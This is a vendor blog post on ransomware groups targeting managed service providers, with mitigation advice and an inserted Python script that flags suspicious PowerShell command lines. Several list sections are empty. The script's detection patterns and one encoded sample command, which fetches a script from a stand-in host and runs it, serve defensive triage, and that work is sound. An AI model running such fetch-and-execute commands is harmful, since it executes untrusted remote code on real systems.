Chris Swagler | December 20th, 2022

Managed service providers (MSPs), which are charged with providing IT security services to clients, have found themselves in the sights of ransomware groups. These threat actors increasingly target the MSP industry, where breaching a single client can allow threat actors to deploy ransomware to dozens of companies. Protecting against this can become a significant challenge for MSPs; however, it can also be an opportunity. MSPs can better defend themselves and their clients by prioritizing internal security protocols. Additionally, it allows security-conscious MSPs to distinguish themselves from competitors who can be more vulnerable to compromise. We’ll look deeper at why ransomware groups are targeting MSPs and examine effective ways to mitigate ransomware attacks.

Threat operators can obtain direct access to clients through an MSP’s infrastructure and then move easily between them and their clients’ shared networks by utilizing the legitimate credentials of compromised MSPs. From there, ransomware can be deployed with minimum effort. According to the Department of Homeland Security, MSPs often have direct and unrestricted access to their clients’ networks and can store clients’ data on their own internal infrastructure. MSPs can obtain significant economies of scale by servicing numerous clients. A compromise in one part of the network, therefore, can spread globally, impacting other clients and adding risk.

MSPs are frequently much smaller than the companies they serve, and 65% of MSPs have fewer than 10 full-time employees. Smaller MSPs often have fewer resources and fewer dedicated security personnel, and frequently lack the time to maintain strict cybersecurity policies. MSPs can be easier targets than larger companies, while providing threat operators with access to thousands of endpoints.

Adhering to proven cybersecurity practices can help secure both internal environments and clients’ endpoints. The following ideas aren’t comprehensive, but rather a compilation of ways to mitigate ransomware.

Ensure Remote Access Tools are Secured

Making remote access tools as safe as possible is one of the most effective things MSPs can do to mitigate ransomware. This can include:

Restrict Network Access

Ransomware attacks on MSPs usually entail the exploitation of stolen credentials. MSPs need to operate with the assumption that their accounts will be compromised at some point and take appropriate steps to restrict network access.

Disable PowerShell If Not Being Used

PowerShell is Microsoft’s built-in task automation and configuration management framework. Even though PowerShell has numerous legitimate purposes, threat actors frequently use it to deliver ransomware because it can execute macros, grant full access to numerous Windows system functions, and execute payloads from memory. If PowerShell is not important to operations, MSPs should disable it. MSPs that must use PowerShell need to closely monitor all PowerShell activities to identify and terminate suspicious behavior.
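One way to review PowerShell activity for the behaviors described above is sketched below. It is an added example, not SpearTip's tooling: the indicator names and patterns, the host names, paths and URL are all assumptions, and the sample events are constructed. It decodes -EncodedCommand arguments (Base64 of UTF-16LE text) so the script inside the blob is inspected as well as the visible switches.

```python
import base64
import re

# Indicator names and patterns are assumptions chosen for this example.
ENCODED = re.compile(r"\s-e(n(c\w*)?)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "download_to_memory": re.compile(r"downloadstring|downloaddata|invoke-webrequest", re.I),
    "dynamic_invoke": re.compile(r"invoke-expression|\biex\b", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.I),
    "policy_bypass": re.compile(r"\s-(ep|ex\w*)\s+bypass\b", re.I),
}

def decode_blob(b64):
    """-EncodedCommand carries Base64 of UTF-16LE text; return it or ''."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers invalid Base64 and invalid UTF-16
        return ""

def triage(cmdline):
    """Return the sorted indicator names found in one command line."""
    hits, texts = set(), [cmdline]
    m = ENCODED.search(cmdline)
    if m:
        hits.add("encoded_command")
        # Scan the visible switches and the decoded script, not the raw blob.
        texts = [cmdline.replace(m.group("b64"), ""), decode_blob(m.group("b64"))]
    for text in texts:
        hits.update(n for n, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)

def review(events, threshold=2):
    """Hosts whose command line shows at least `threshold` indicators."""
    return [e["host"] for e in events if len(triage(e["cmd"])) >= threshold]

def encode(script):  # helper used only to build the constructed sample
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample events (hypothetical hosts, paths and URL).
SAMPLE = [
    {"host": "rmm-01", "cmd": r"powershell.exe -File C:\Scripts\Rotate-Logs.ps1"},
    {"host": "ws-17", "cmd": r"powershell.exe -NoProfile -WindowStyle Hidden "
                              r"-ExecutionPolicy Bypass -File C:\Temp\u.ps1"},
    {"host": "ws-22", "cmd": "powershell.exe -NoP -enc " + encode(
        "Invoke-WebRequest -Uri https://example.invalid/s.ps1 | Invoke-Expression")},
]

if __name__ == "__main__":
    for e in SAMPLE:
        print(e["host"], triage(e["cmd"]))
```

The same checks can be applied to process-creation or script block log records once the command text has been extracted from them.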

Secure All Endpoints

Even though ransomware can be spread in various ways, numerous attacks start the old-fashioned way with users being deceived by malicious emails. There are several ways MSPs can protect their employees:

Maintain Offsite Backups

Any ransomware mitigation approach needs to include an effective backup system. It’s critical for MSPs to realize that if threat operators have compromised their RMM software, they will likely have access to MSPs’ backups. If threat operators can delete backups and gain an advantage, they will do so. Additionally, some ransomware strains are designed to encrypt local and cloud backups. The most straightforward and successful method of developing ransomware-proof backups is to follow the 3-2-1 rule, which states that MSPs need to:

Have BYOD Policies

Cloud-based tools are common in MSPs’ environments; however, any device used to access corporate resources needs to be considered a potential security risk. MSPs need to ensure that all company-issued devices used for work purposes are secured properly and develop policies for employees who work remotely using personal devices. Restricting network access, requiring VPN usage, installing device encryption, and mandating MFA can assist MSPs in securing BYOD devices and lowering the risk of compromise.

Create and Test Incident Response Plans

MSPs can do everything right and still experience ransomware attacks. When incidents occur, it’s critical for MSPs to have a plan in place to respond quickly and effectively.

MSPs’ security is directly linked to their clients. If MSPs are compromised, it’s likely that their clients will follow, resulting in severe downtime and ransom demands. Companies put enormous trust in MSPs, and it’s important they fulfill this trust by doing everything possible to reduce the risk of ransomware incidents. A proactive security strategy allows MSPs to gain a competitive advantage as cybersecurity becomes a more critical company consideration across industries. Additionally, it’s important for MSPs and their clients to always remain alert to the current threat landscape and follow the mitigation process mentioned above to reduce the risk of potential ransomware attacks.

At SpearTip, MSPs can upsell their security offerings by incorporating our pre-breach risk services into their current catalog. We offer our integrable cybersecurity solution, which allows MSPs to focus on their clients’ core IT objectives while providing industry-leading protection against malicious ransomware threats. Our certified engineers respond to thousands of security incidents to improve clients’ operational, procedural, and technical control gaps based on security standards.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.